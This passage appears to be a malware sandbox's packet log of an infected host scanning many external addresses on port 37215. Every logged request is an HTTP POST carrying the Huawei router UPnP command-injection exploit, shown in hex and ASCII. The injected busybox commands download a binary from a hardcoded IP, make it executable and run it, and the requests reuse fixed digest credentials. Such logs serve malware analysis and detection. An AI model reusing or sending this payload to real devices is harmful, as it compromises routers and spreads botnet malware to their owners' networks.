78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1348192.168.2.1554030197.34.98.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731283903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1349192.168.2.1546586197.29.80.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731290102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1350192.168.2.1532896197.33.182.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731321096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1351192.168.2.1533682197.135.214.7237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731348038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1352192.168.2.1535506197.250.28.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731364965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1353192.168.2.1550280197.170.20.5337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731365919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1354192.168.2.1547704197.102.227.11837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731365919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1355192.168.2.1537302197.99.155.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731388092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1356192.168.2.1555538197.74.138.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731422901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1357192.168.2.1549868197.195.240.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731429100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1358192.168.2.1538504197.111.53.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731450081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
